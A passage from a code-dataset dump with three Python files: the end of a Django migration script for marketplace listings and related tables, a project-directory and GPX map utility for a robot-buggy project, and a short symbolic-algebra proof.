migrate_image(image_uuid, image_type):\n \"\"\"\n Migrate an image\n\n A 
image_mapper is not needed, as the old uuid will be the new uuid\n \"\"\"\n # determine the image's extension\n VALID_IMAGE_TYPES = ['png', 'jpg', 'jpeg', 'gif']\n file_extension = None\n for i in VALID_IMAGE_TYPES:\n filename = IMAGE_FILE_PATH + '/{0!s}.{1!s}'.format(image_uuid, i)\n if os.path.isfile(filename):\n file_extension = i\n break\n if not file_extension:\n logging.error('Error: no file extension found for image {0!s}'.format(image_uuid))\n return\n\n # set default security marking\n image_type = models.ImageType.objects.get(name=image_type)\n img = models.Image(uuid=image_uuid, security_marking=DEFAULT_SECURITY_MARKING,\n file_extension=file_extension, image_type=image_type)\n img.save()\n\n src = filename\n dest = settings.MEDIA_ROOT + str(img.id) + '_' + img.image_type.name + '.' + file_extension\n shutil.copy(src, dest)\n logging.info('Migrated image: {0!s}, type: {1!s}'.format(image_uuid, image_type))\n return img\n\ndef migrate_listing(category_mapper, agency_mapper, type_mapper,\n contact_type_mapper, profile_mapper):\n logging.debug('migrating listings')\n columns = get_columns('listing')\n logging.debug('listing columns: {0!s}'.format(columns))\n # ['id', 'version', 'agency_id', 'approval_status', 'approved_date', 'avg_rate',\n # 'created_by_id', 'created_date', 'description', 'description_short',\n # 'edited_by_id', 'edited_date', 'small_icon_id', 'large_icon_id',\n # 'banner_icon_id', 'featured_banner_icon_id', 'is_enabled', 'is_featured',\n # 'last_activity_id', 'launch_url', 'requirements', 'title', 'total_comments',\n # 'total_rate1', 'total_rate2', 'total_rate3', 'total_rate4', 'total_rate5',\n # 'total_votes', 'type_id', 'uuid', 'version_name', 'what_is_new',\n # 'width', 'singleton', 'height']\n assert columns[0] == 'id'\n assert columns[1] == 'version'\n assert columns[2] == 'agency_id'\n assert columns[3] == 'approval_status'\n assert columns[4] == 'approved_date'\n assert columns[5] == 'avg_rate'\n assert columns[6] == 'created_by_id'\n assert columns[7] == 'created_date'\n assert columns[8] == 'description'\n assert columns[9] == 'description_short'\n assert columns[10] == 'edited_by_id'\n assert columns[11] == 'edited_date'\n assert columns[12] == 'small_icon_id'\n assert columns[13] == 'large_icon_id'\n assert columns[14] == 'banner_icon_id'\n assert columns[15] == 'featured_banner_icon_id'\n assert columns[16] == 'is_enabled'\n assert columns[17] == 'is_featured'\n assert columns[18] == 'last_activity_id'\n assert columns[19] == 'launch_url'\n assert columns[20] == 'requirements'\n assert columns[21] == 'title'\n assert columns[22] == 'total_comments'\n assert columns[23] == 'total_rate1'\n assert columns[24] == 'total_rate2'\n assert columns[25] == 'total_rate3'\n assert columns[26] == 'total_rate4'\n assert columns[27] == 'total_rate5'\n assert columns[28] == 'total_votes'\n assert columns[29] == 'type_id'\n assert columns[30] == 'uuid'\n assert columns[31] == 'version_name'\n assert columns[32] == 'what_is_new'\n assert columns[33] == 'width'\n assert columns[34] == 'singleton'\n assert columns[35] == 'height'\n values = get_values('listing', len(columns))\n # logging.debug('listing values: %s' % values)\n logging.info('Listings to migrate: {0!s}'.format(len(values)))\n\n # map old ids to new ones for future migrations: {'': ''}\n listing_mapper = {}\n logging.info('==========================')\n for i in values:\n try:\n old_id = i[0]\n agency = models.Agency.objects.get(id=agency_mapper[i[2]])\n title = i[21]\n # approval_status should be a 1-1 
mapping\n            approval_status = i[3]\n            approved_date = get_date_from_str(i[4])\n            avg_rate = i[5]\n            created_by_id = i[6]\n            created_date = get_date_from_str(i[7])\n            description = i[8]\n            description_short = i[9]\n            edited_by_id = i[10]\n            edited_date = get_date_from_str(i[11])\n            small_icon_id = i[12]\n            small_icon = migrate_image(small_icon_id, 'small_icon')\n            large_icon_id = i[13]\n            large_icon = migrate_image(large_icon_id, 'large_icon')\n            banner_icon_id = i[14]\n            banner_icon = migrate_image(banner_icon_id, 'banner_icon')\n            featured_banner_icon_id = i[15]\n            large_banner_icon = migrate_image(featured_banner_icon_id, 'large_banner_icon')\n            is_enabled = i[16]\n            is_featured = i[17]\n            last_activity_id = i[18]\n            launch_url = i[19]\n            requirements = i[20]\n            total_comments = i[22]\n            total_rate1 = i[23]\n            total_rate2 = i[24]\n            total_rate3 = i[25]\n            total_rate4 = i[26]\n            total_rate5 = i[27]\n            total_votes = i[28]\n            listing_type = models.ListingType.objects.get(id=type_mapper[i[29]])\n            uuid = i[30]\n            version_name = i[31]\n            what_is_new = i[32]\n            iframe_compatible = not i[34]\n\n            logging.info('Adding listing title: {0!s}'.format(title))\n            # TODO: unique_name?\n            listing = models.Listing(title=title, agency=agency,\n                approval_status=approval_status, approved_date=approved_date,\n                edited_date=edited_date, description=description,\n                description_short=description_short, is_enabled=is_enabled,\n                is_featured=is_featured, launch_url=launch_url,\n                listing_type=listing_type, version_name=version_name,\n                what_is_new=what_is_new, iframe_compatible=iframe_compatible,\n                requirements=requirements, small_icon=small_icon,\n                large_icon=large_icon, banner_icon=banner_icon,\n                large_banner_icon=large_banner_icon, avg_rate=avg_rate,\n                total_votes=total_votes, total_rate5=total_rate5,\n                total_rate4=total_rate4, total_rate3=total_rate3,\n                total_rate2=total_rate2, total_rate1=total_rate1,\n                total_reviews=total_comments, security_marking=DEFAULT_SECURITY_MARKING)\n            listing.save()\n            listing_mapper[old_id] = str(listing.id)\n        except Exception as e:\n            logging.error('Error processing listing {0!s}: {1!s}'.format(title, str(e)))\n\n    return listing_mapper\n\ndef migrate_application_library_entry(profile_mapper, listing_mapper):\n    logging.debug('migrating application_library_entry...')\n    columns = get_columns('application_library_entry')\n    # ['id', 'version', 'created_by_id', 'created_date', 'edited_by_id', 'edited_date', 'folder', 'listing_id', 'owner_id', 'application_library_idx']\n    assert columns[0] == 'id'\n    assert columns[1] == 'version'\n    assert columns[2] == 'created_by_id'\n    assert columns[3] == 'created_date'\n    assert columns[4] == 'edited_by_id'\n    assert columns[5] == 'edited_date'\n    assert columns[6] == 'folder'\n    assert columns[7] == 'listing_id'\n    assert columns[8] == 'owner_id'\n    values = get_values('application_library_entry', len(columns))\n    # logging.debug('category columns: %s' % columns)\n    logging.info('Application Library Entries to migrate: {0!s}'.format(len(values)))\n    logging.info('==========================')\n    for i in values:\n        try:\n            old_id = i[0]\n            folder = i[6]\n            listing_id = i[7]\n            listing = models.Listing.objects.get(id=listing_mapper[listing_id])\n            owner = models.Profile.objects.get(id=profile_mapper[i[8]])\n            logging.info('Adding application_library_entry for listing {0!s}, owner {1!s}'.format(listing.title, owner.user.username))\n            entry = models.ApplicationLibraryEntry(folder=folder, listing=listing, owner=owner)\n            entry.save()\n        except Exception as e:\n            logging.error('Error adding library entry: {0!s}, values: 
{1!s}'.format(str(e), i))\n\ndef migrate_doc_url(listing_mapper):\n    logging.debug('migrating doc_url...')\n    columns = get_columns('doc_url')\n    # ['id', 'version', 'listing_id', 'name', 'url']\n    assert columns[0] == 'id'\n    assert columns[1] == 'version'\n    assert columns[2] == 'listing_id'\n    assert columns[3] == 'name'\n    assert columns[4] == 'url'\n    values = get_values('doc_url', len(columns))\n    # logging.debug('category columns: %s' % columns)\n    logging.info('Doc Urls to migrate: {0!s}'.format(len(values)))\n    logging.info('==========================')\n    for i in values:\n        try:\n            old_id = i[0]\n            listing_id = i[2]\n            name = i[3]\n            url = i[4]\n            listing = models.Listing.objects.get(id=listing_mapper[listing_id])\n            logging.info('Adding doc_url for listing {0!s}, name {1!s}'.format(listing.title, name))\n            doc_url = models.DocUrl(name=name, url=url, listing=listing)\n            doc_url.save()\n        except Exception as e:\n            logging.error('Error adding doc_url entry: {0!s}, values: {1!s}'.format(str(e), i))\n\ndef migrate_item_comment(profile_mapper, listing_mapper):\n    logging.debug('migrating item_comment...')\n    columns = get_columns('item_comment')\n    # ['id', 'version', 'author_id', 'created_by_id', 'created_date', 'edited_by_id', 'edited_date', 'listing_id', 'rate', 'text']\n    assert columns[0] == 'id'\n    assert columns[1] == 'version'\n    assert columns[2] == 'author_id'\n    assert columns[3] == 'created_by_id'\n    assert columns[4] == 'created_date'\n    assert columns[5] == 'edited_by_id'\n    assert columns[6] == 'edited_date'\n    assert columns[7] == 'listing_id'\n    assert columns[8] == 'rate'\n    assert columns[9] == 'text'\n    values = get_values('item_comment', len(columns))\n    # logging.debug('category columns: %s' % columns)\n    logging.info('Reviews to migrate: {0!s}'.format(len(values)))\n    logging.info('==========================')\n    for i in values:\n        try:\n            old_id = i[0]\n            listing = models.Listing.objects.get(id=listing_mapper[i[7]])\n            author = models.Profile.objects.get(id=profile_mapper[i[2]])\n            edited_date = get_date_from_str(i[6])\n            rate = i[8]\n            text = i[9]\n            review = models.Review(text=text, rate=rate,\n                edited_date=edited_date, author=author, listing=listing)\n            logging.info('Adding review for listing {0!s}, rate: {1!s}, text: {2!s}'.format(listing.title, rate, text))\n            review.save()\n        except Exception as e:\n            logging.error('Error adding review entry: {0!s}, values: {1!s}'.format(str(e), i))\n\ndef migrate_iwc_data_object(profile_mapper):\n    logging.debug('migrating iwc_data_object...')\n    columns = get_columns('iwc_data_object')\n    # ['id', 'version', 'content_type', 'entity', 'key', 'profile_id']\n    assert columns[0] == 'id'\n    assert columns[1] == 'version'\n    assert columns[2] == 'content_type'\n    assert columns[3] == 'entity'\n    assert columns[4] == 'key'\n    assert columns[5] == 'profile_id'\n    values = get_values('iwc_data_object', len(columns))\n    # logging.debug('category columns: %s' % columns)\n    logging.info('IWC data objects to migrate: {0!s}'.format(len(values)))\n    logging.info('==========================')\n    for i in values:\n        try:\n            old_id = i[0]\n            profile = models.Profile.objects.get(id=profile_mapper[i[5]])\n            key = i[4]\n            content_type = i[2]\n            entity = i[3]\n            # TODO: any modification here to match new api?\n            data = iwc_models.DataResource(key=key, entity=entity,\n                content_type=content_type, username=profile.user.username)\n            logging.info('Adding iwc DataObject for user {0!s}, key: {1!s}, content_type: {2!s}'.format(\n                profile.user.username, key, content_type))\n            data.save()\n        except Exception as e:\n            logging.error('Error adding iwc DataObject entry: {0!s}, values: {1!s}'.format(str(e), 
i))\n\ndef migrate_listing_category(listing_mapper, category_mapper):\n    logging.debug('migrating listing_category...')\n    columns = get_columns('listing_category')\n    # ['listing_categories_id', 'category_id']\n    assert columns[0] == 'listing_categories_id'\n    assert columns[1] == 'category_id'\n    values = get_values('listing_category', len(columns))\n    # logging.debug('category columns: %s' % columns)\n    logging.info('listing_category associations to migrate: {0!s}'.format(len(values)))\n    logging.info('==========================')\n    for i in values:\n        try:\n            listing_id = i[0]\n            category_id = i[1]\n            listing = models.Listing.objects.get(id=listing_mapper[listing_id])\n            category = models.Category.objects.get(id=category_mapper[category_id])\n            logging.info('Adding category for listing {0!s}, name {1!s}'.format(listing.title, category.title))\n            listing.categories.add(category)\n        except Exception as e:\n            logging.error('Error adding category to listing: {0!s}, values: {1!s}'.format(str(e), i))\n\ndef migrate_listing_profile(profile_mapper, listing_mapper):\n    # owners\n    logging.debug('migrating listing_profile...')\n    columns = get_columns('listing_profile')\n    # ['listing_owners_id', 'profile_id']\n    assert columns[0] == 'listing_owners_id'\n    assert columns[1] == 'profile_id'\n    values = get_values('listing_profile', len(columns))\n    # logging.debug('category columns: %s' % columns)\n    logging.info('listing_profile associations to migrate: {0!s}'.format(len(values)))\n    logging.info('==========================')\n    for i in values:\n        try:\n            listing_id = i[0]\n            profile_id = i[1]\n            listing = models.Listing.objects.get(id=listing_mapper[listing_id])\n            profile = models.Profile.objects.get(id=profile_mapper[profile_id])\n            logging.info('Adding owner for listing {0!s}, username {1!s}'.format(listing.title, profile.user.username))\n            listing.owners.add(profile)\n        except Exception as e:\n            logging.error('Error adding owner to listing: {0!s}, values: {1!s}'.format(str(e), i))\n\ndef migrate_listing_screenshot(listing_mapper):\n    logging.debug('migrating screenshot...')\n    columns = get_columns('screenshot')\n    # ['id', 'version', 'created_by_id', 'created_date', 'edited_by_id', 'edited_date', 'large_image_id', 'service_item_id', 'small_image_id', 'ordinal']\n    assert columns[0] == 'id'\n    assert columns[1] == 'version'\n    assert columns[2] == 'created_by_id'\n    assert columns[3] == 'created_date'\n    assert columns[4] == 'edited_by_id'\n    assert columns[5] == 'edited_date'\n    assert columns[6] == 'large_image_id'\n    assert columns[7] == 'service_item_id'\n    assert columns[8] == 'small_image_id'\n    assert columns[9] == 'ordinal'\n    values = get_values('screenshot', len(columns))\n    # logging.debug('category columns: %s' % columns)\n    logging.info('Screenshots to migrate: {0!s}'.format(len(values)))\n    logging.info('==========================')\n    for i in values:\n        try:\n            old_id = i[0]\n            large_image_id = i[6]\n            small_image_id = i[8]\n            listing_id = i[7]\n            listing = models.Listing.objects.get(id=listing_mapper[listing_id])\n            small_image = migrate_image(small_image_id, 'small_screenshot')\n            large_image = migrate_image(large_image_id, 'large_screenshot')\n            logging.info('Adding screenshot for listing {0!s}, large_image_id {1!s}'.format(listing.title, large_image_id))\n            screenshot = models.Screenshot(small_image=small_image, large_image=large_image, listing=listing)\n            screenshot.save()\n        except Exception as e:\n            logging.error('Error adding screenshot entry: {0!s}, values: {1!s}'.format(str(e), i))\n\ndef migrate_listing_tags(listing_mapper):\n    logging.debug('migrating 
listing_tags...')\n    columns = get_columns('listing_tags')\n    # ['listing_id', 'tags_string']\n    assert columns[0] == 'listing_id'\n    assert columns[1] == 'tags_string'\n    values = get_values('listing_tags', len(columns))\n    # logging.debug('category columns: %s' % columns)\n    logging.info('Tags to migrate: {0!s}'.format(len(values)))\n    logging.info('==========================')\n    for i in values:\n        try:\n            listing_id = i[0]\n            name = i[1]\n            listing = models.Listing.objects.get(id=listing_mapper[listing_id])\n            try:\n                tag = models.Tag(name=name)\n                tag.save()\n            except Exception:\n                tag = models.Tag.objects.get(name=name)\n            logging.info('Adding tag for listing {0!s}, name {1!s}'.format(listing.title, tag))\n            listing.tags.add(tag)\n\n        except Exception as e:\n            logging.error('Error adding tag entry: {0!s}, values: {1!s}'.format(str(e), i))\n\ndef migrate_contact(listing_mapper, contact_type_mapper):\n    logging.debug('migrating contact...')\n    columns = get_columns('contact')\n    # ['id', 'version', 'created_by_id', 'created_date', 'edited_by_id', 'edited_date', 'email',\n    # 'listing_id', 'name', 'organization', 'secure_phone', 'type_id', 'unsecure_phone']\n    assert columns[0] == 'id'\n    assert columns[1] == 'version'\n    assert columns[2] == 'created_by_id'\n    assert columns[3] == 'created_date'\n    assert columns[4] == 'edited_by_id'\n    assert columns[5] == 'edited_date'\n    assert columns[6] == 'email'\n    assert columns[7] == 'listing_id'\n    assert columns[8] == 'name'\n    assert columns[9] == 'organization'\n    assert columns[10] == 'secure_phone'\n    assert columns[11] == 'type_id'\n    assert columns[12] == 'unsecure_phone'\n\n    values = get_values('contact', len(columns))\n    # logging.debug('category columns: %s' % columns)\n    logging.info('Contacts to migrate: {0!s}'.format(len(values)))\n    logging.info('==========================')\n    for i in values:\n        try:\n            email = i[6]\n            listing_id = i[7]\n            name = i[8]\n            organization = i[9]\n            secure_phone = i[10]\n            type_id = i[11]\n            contact_type = models.ContactType.objects.get(id=contact_type_mapper[type_id])\n            unsecure_phone = i[12]\n            listing = models.Listing.objects.get(id=listing_mapper[listing_id])\n            try:\n                contact = models.Contact(name=name, email=email, secure_phone=secure_phone,\n                    unsecure_phone=unsecure_phone, contact_type=contact_type)\n                contact.save()\n            except Exception:\n                logging.warning('Error: Found duplicate contact entry: {0!s}'.format(name))\n                contact = models.Contact.objects.get(name=name)\n            logging.info('Adding contact {0!s} for listing {1!s}'.format(name, listing.title))\n            listing.contacts.add(contact)\n\n        except Exception as e:\n            logging.error('Error adding contact entry: {0!s}, values: {1!s}'.format(str(e), i))\n\ndef migrate_listing_activities(profile_mapper, listing_mapper):\n    logging.debug('migrating listing_activity...')\n    columns = get_columns('listing_activity')\n    # ['id', 'version', 'action', 'activity_date', 'author_id', 'created_by_id', 'created_date',\n    # 'edited_by_id', 'edited_date', 'listing_id', 'listing_activities_idx']\n    assert columns[0] == 'id'\n    assert columns[1] == 'version'\n    assert columns[2] == 'action'\n    assert columns[3] == 'activity_date'\n    assert columns[4] == 'author_id'\n    assert columns[5] == 'created_by_id'\n    assert columns[6] == 'created_date'\n    assert columns[7] == 'edited_by_id'\n    assert columns[8] == 'edited_date'\n    assert columns[9] == 'listing_id'\n    assert columns[10] == 'listing_activities_idx'\n    values = get_values('listing_activity', len(columns))\n    # logging.debug('category columns: %s' % columns)\n    logging.info('Listing 
Activities to migrate: {0!s}'.format(len(values)))\n    listing_activity_mapper = {}\n    logging.info('==========================')\n    for i in values:\n        try:\n            old_id = i[0]\n            action = i[2]\n            author_id = i[4]\n            listing_id = i[9]\n            activity_date = get_date_from_str(i[3])  # column 3 is activity_date; column 8 is edited_date\n            author = models.Profile.objects.get(id=profile_mapper[author_id])\n            listing = models.Listing.objects.get(id=listing_mapper[listing_id])\n            logging.info('Adding listing_activity {0!s} for listing {1!s}'.format(action, listing.title))\n            listing_activity = models.ListingActivity(action=action, activity_date=activity_date,\n                author=author, listing=listing)\n            listing_activity.save()\n            listing_activity_mapper[old_id] = str(listing_activity.id)\n        except Exception as e:\n            logging.warning('Error adding listing_activity entry: {0!s}, values: {1!s}'.format(str(e), i))\n\n    return listing_activity_mapper\n\ndef migrate_change_detail(listing_activity_mapper):\n    logging.debug('migrating change_detail...')\n    columns = get_columns('change_detail')\n    # ['id', 'version', 'field_name', 'new_value', 'old_value', 'service_item_activity_id']\n    assert columns[0] == 'id'\n    assert columns[1] == 'version'\n    assert columns[2] == 'field_name'\n    assert columns[3] == 'new_value'\n    assert columns[4] == 'old_value'\n    assert columns[5] == 'service_item_activity_id'\n    values = get_values('change_detail', len(columns))\n    # logging.debug('category columns: %s' % columns)\n    logging.info('Change details to migrate: {0!s}'.format(len(values)))\n    logging.info('==========================')\n    for i in values:\n        try:\n            field_name = i[2]\n            new_value = i[3]\n            old_value = i[4]\n            listing_activity_id = i[5]\n            listing_activity = models.ListingActivity.objects.get(id=listing_activity_mapper[listing_activity_id])\n            logging.info('Adding change_detail for listing {0!s}, field_name {1!s}'.format(listing_activity.listing.title, field_name))\n            change_detail = models.ChangeDetail(field_name=field_name,\n                old_value=old_value, new_value=new_value)\n            change_detail.save()\n            listing_activity.change_details.add(change_detail)\n        except Exception as e:\n            logging.warning('Error adding change_detail entry: {0!s}, values: {1!s}'.format(str(e), i))\n\ndef migrate_rejection_data(listing_mapper, listing_activity_mapper):\n    \"\"\"\n    Set ListingActivity.description for all REJECTED activities\n    \"\"\"\n    logging.debug('getting data from rejection_activity...')\n    columns = get_columns('rejection_activity')\n    # ['id', 'rejection_listing_id']\n    assert columns[0] == 'id'\n    assert columns[1] == 'rejection_listing_id'\n    rejection_activity_values = get_values('rejection_activity', len(columns))\n    # logging.debug('category columns: %s' % columns)\n    logging.info('Rejection activities to migrate: {0!s}'.format(len(rejection_activity_values)))\n\n    logging.debug('getting data from rejection_listing...')\n    columns = get_columns('rejection_listing')\n    # ['id', 'version', 'author_id', 'created_by_id', 'created_date', 'description',\n    # 'edited_by_id', 'edited_date', 'service_item_id']\n    assert columns[0] == 'id'\n    assert columns[1] == 'version'\n    assert columns[2] == 'author_id'\n    assert columns[3] == 'created_by_id'\n    assert columns[4] == 'created_date'\n    assert columns[5] == 'description'\n    assert columns[6] == 'edited_by_id'\n    assert columns[7] == 'edited_date'\n    assert columns[8] == 'service_item_id'\n    rejection_listing_values = get_values('rejection_listing', len(columns))\n    # logging.debug('category columns: %s' % columns)\n    logging.info('Rejection listings to migrate: 
{0!s}'.format(len(rejection_listing_values)))\n\n inverse_listing_activity_mapper = {v: k for k, v in listing_activity_mapper.items()}\n\n\n listing_activities = models.ListingActivity.objects.all()\n for activity in listing_activities:\n if activity.action == 'REJECTED':\n found_description = False\n try:\n logging.info('Found REJECTED action for listing {0!s}'.format(activity.listing.title))\n except Exception:\n logging.warning('Error: Found REJECTED action for non-existent listing')\n continue\n # find the corresponding rejection_activity\n old_listing_activity_id = inverse_listing_activity_mapper[str(activity.id)]\n for rejection_activity in rejection_activity_values:\n if rejection_activity[0] == old_listing_activity_id:\n for rejection_listing in rejection_listing_values:\n if rejection_listing[0] == rejection_activity[1]:\n description = rejection_listing[5]\n logging.info('Adding reason for rejection: {0!s}'.format(description))\n activity.description = description\n activity.save()\n found_description = True\n if not found_description:\n logging.warning('Error: Failed to find a description for a REJECTED activity')\n\n\nif __name__ == \"__main__\":\n run()\n","sub_path":"db_migration/onetime_db_migration.py","file_name":"onetime_db_migration.py","file_ext":"py","file_size_in_byte":45292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"409759156","text":"\"\"\"\nContains functions that return important project directories\n\"\"\"\n\nimport os\nimport random\nimport sys\n\n# dictionary of important local project directories\nproject_dirs = {\n 'logs' : \"logs/\",\n 'maps' : \"maps/\",\n # 'pickled' : \"pickled/\",\n 'gpx' : \"maps/gpx/\",\n 'videos' : \"videos/\",\n 'images' : \"images/\",\n 'joysticks' : \"joysticks/\",\n # 'simulations': \"pickled/simulations/\",\n 'project' : \"\",\n}\n\n\ndef get_platform():\n \"\"\"Use for platform specific operations\"\"\"\n if sys.platform.startswith('darwin'): # OS X\n return \"mac\"\n elif (sys.platform.startswith('linux') or sys.platform.startswith(\n 'cygwin')):\n return \"linux\"\n elif sys.platform.startswith('win'): # Windows\n return \"windows\"\n else:\n return None\n\n\ndef interpret_dir(directory=\".\"):\n \"\"\"\n Search project_dirs and format the directory into an absolute\n directory. If the directory doesn't exist, make it\n\n A directory shortcut starts with \":\"\n For example:\n \":logs\" becomes \"[full path to]/logs/\"\n \":logs/Dec 27 2016\" becomes \"[full path to]/logs/Dec 27 2016/\"\n\n :return: Absolute path to directory\n \"\"\"\n if len(directory) > 0 and directory[0] == ':':\n shortcut_start = directory.find(\":\") + 1\n shortcut_end = directory.find(\"/\", shortcut_start)\n if shortcut_end == -1:\n key = directory[shortcut_start:]\n directory = project_dirs[key]\n else:\n key = directory[shortcut_start: shortcut_end]\n directory = os.path.join(project_dirs[key],\n directory[shortcut_end + 1:])\n\n abs_directory = os.path.abspath(directory)\n\n if not os.path.isdir(abs_directory):\n os.mkdir(abs_directory)\n\n return abs_directory\n\n\ndef parse_dir(directory, default, sort_fn=None):\n \"\"\"\n Formats the input directory using get_dir. The 'default' argument is the\n directory to start in. It should be a project directory flag. 
Useful if\n    the user doesn't provide a specific directory but you know what kind of\n    file in the project you are looking for.\n\n    If :random is provided for the directory, a directory will be selected at\n    random from within the default directory\n    \"\"\"\n    if directory is None:\n        directory = interpret_dir(default)\n    elif directory == \":random\":\n        directories = []\n        for local_dir in os.listdir(interpret_dir(default)):\n            directory = os.path.join(interpret_dir(default), local_dir)\n            if os.path.isdir(directory):\n                directories.append(directory)\n        directory = random.choice(directories)\n        print(\"Using directory '%s'\" % directory)\n\n    elif type(directory) == int:\n        directory = _get_dirs(interpret_dir(default), sort_fn)[directory]\n\n    elif os.path.isdir(os.path.join(interpret_dir(default), directory)):\n        directory = os.path.join(interpret_dir(default), directory)\n\n    return directory\n\n\ndef _get_dirs(directory, sort_fn):\n    local_dir = []\n    directories = []\n    contents = sorted(os.listdir(directory), key=lambda v: v.lower())\n    for item in contents:\n        full_dir = os.path.join(directory, item)\n        if os.path.isdir(full_dir):\n            local_dir.append(item)\n            directories.append(full_dir)\n\n    def internal_sort_fn(x):\n        # hack to just use the first element in the zipped list\n        return sort_fn(x[0])\n\n    # sort full directory list in the order the local directory list is sorted\n    directories = [full for (local, full) in\n                   sorted(zip(local_dir, directories), key=internal_sort_fn)]\n    return directories\n\n\ndef _get_files(directory, file_types):\n    \"\"\"\n    Gets all file names of the specified file type in a directory\n    file_types can be a list of file types or a string containing one file type\n    \"\"\"\n    if type(file_types) == str:\n        file_types = [file_types]\n    file_names = []\n    contents = sorted(os.listdir(directory), key=lambda v: v.lower())\n    for item in contents:\n        for file_type in file_types:\n            if item.endswith(file_type):\n                file_names.append(item)\n    return file_names\n\n\ndef get_file_name(file_name, directory, file_types):\n    \"\"\"\n    Gets a file within a directory. The file name can be the index of the file\n    in the directory ordered by name, the name of the file, or a random file\n    (specified by supplying :random for file_name).\n\n    file_type is the desired file extension (for example: 'txt', 'avi')\n    don't put in the '.' before the extension!!\n    \"\"\"\n    if type(file_name) == int:\n        # file_name is the index in the list of files in the directory\n        file_name = _get_files(directory, file_types)[file_name]\n    elif type(file_name) == str:\n        if file_name == \":random\":\n            file_name = random.choice(_get_files(directory, file_types))\n        elif type(file_types) == str:\n            if not file_name.endswith(file_types):\n                file_name += '.' + file_types\n    else:\n        raise ValueError(\"Invalid file name: \" + str(file_name))\n\n    return file_name\n\n\ndef _get_gpx_map(file_name, directory):\n    \"\"\"Parse a map from a GPX file\"\"\"\n    with open(os.path.join(directory, file_name), 'r') as gpx_file:\n        contents = gpx_file.read()\n\n    gps_map = []\n\n    # xml parsing. Extract the long and lat from the file\n    # NOTE: the original angle-bracket string literals were lost during text\n    # extraction; the flags and split below are a reconstruction inferred from\n    # the slice offsets applied to the parsed tokens\n    start_flags = ['<trkpt ', '<rtept ']\n    for line in contents.splitlines():\n        if any(flag in line for flag in start_flags):\n            unparsed = line.strip().split(\" \")\n            if len(unparsed) > 1:\n                if len(unparsed) == 2:\n                    lat_unparsed, long_unparsed = unparsed\n                else:\n                    _, lat_unparsed, long_unparsed = unparsed\n\n                lat = float(lat_unparsed[5:-1])  # strips 'lat=\"' and the trailing '\"'\n                long = float(long_unparsed[5:-10])  # strips 'lon=\"' and '\"></trkpt>'\n\n                gps_map.append((lat, long))\n\n    return gps_map\n\n\ndef get_map(file_name, directory=None):\n    \"\"\"\n    Get a map as a list of tuples [(long0, lat0), (long1, lat1), ...].\n\n    Two possible file types for maps are txt and gpx. 
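For example, get_map(0) loads the first gpx file in the maps directory (sorted by name), while get_map(\":random\") picks one at random. 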
You will either need\n to specify the :gpx or :maps directory, or give a file extension for the\n file name. If no directory and no file extension is given, gpx is assumed\n \"\"\"\n\n if directory is None:\n directory = \":maps\"\n\n directory = interpret_dir(directory)\n file_name = get_file_name(file_name, directory, 'gpx')\n gps_map = _get_gpx_map(file_name, directory)\n\n print(\"Using map named\", file_name)\n print(\"Length of map is\", len(gps_map))\n\n return gps_map\n\n\ndef parse_arguments(default_file=-1, default_directory=-1):\n file_name = default_file\n directory = default_directory\n\n if len(sys.argv) == 2:\n file_name = sys.argv[1]\n elif len(sys.argv) == 3:\n file_name, directory = sys.argv[1:]\n\n try:\n file_name = int(file_name)\n directory = int(directory)\n except ValueError:\n pass\n\n return file_name, directory\n","sub_path":"Atlasbuggy/atlasbuggy/project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":7315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"142730052","text":"from util import *\n\n\n@apply\ndef apply(self):\n ((i, (j, S[i])), (S[j], S[j < i]), (S[0], S[True])), (S[j], S[0], n), (S[i], S[0], S[n]) = \\\n self.of(\n Lamda[\n Piecewise[ExprCondPair[Greater], \n ExprCondPair, \n ExprCondPair\n ]\n ])\n return Equal(self, (1 - Identity(n)) * Lamda[j:n, i:n](Min(i, j)))\n\n\n@prove\ndef prove(Eq):\n from axiom import algebra\n\n n = Symbol(integer=True, positive=True)\n i, j = Symbol(integer=True)\n Eq << apply(Lamda[j:n, i:n](Piecewise((i, j > i), (j, j < i), (0, True))))\n\n i, j = Symbol(domain=Range(n))\n Eq << algebra.eq.given.eq.getitem.apply(Eq[0], (i, j))\n\n Eq << Eq[-1].this.find(Min).apply(algebra.min.to.piece)\n\n Eq << Eq[-1].this.rhs.apply(algebra.mul.to.piece)\n\n Eq << Eq[-1].this.rhs.simplify(wrt=i)\n\n Eq << Eq[-1].this.find(LessEqual).reversed\n\n Eq << Eq[-1].this.find(KroneckerDelta).apply(algebra.kroneckerDelta.to.piece)\n\n Eq << Eq[-1].this.find(Mul[Piecewise]).apply(algebra.mul.to.piece, simplify=None)\n\n Eq << Eq[-1].this.find(Add[Piecewise]).apply(algebra.add.to.piece, simplify=False)\n\n Eq << Eq[-1].this.find(Mul[Piecewise]).apply(algebra.mul.to.piece, simplify=False)\n\n Eq << Eq[-1].this.rhs.apply(algebra.piece.flatten, index=0)\n\n Eq << Eq[-1].this.rhs.apply(algebra.piece.swap)\n\n Eq << Eq[-1].this.lhs.apply(algebra.piece.swap, -2)\n\n Eq << Eq[-1].this.lhs.apply(algebra.piece.invert, 0)\n\n Eq << Eq[-1].this.lhs.find(Equal).reversed\n\n \n \n\n\nif __name__ == '__main__':\n run()\n# created on 2019-10-18\n# updated on 2022-04-01\n","sub_path":"axiom/algebra/lamda_piece/to/mul/lamda/min.py","file_name":"min.py","file_ext":"py","file_size_in_byte":1621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
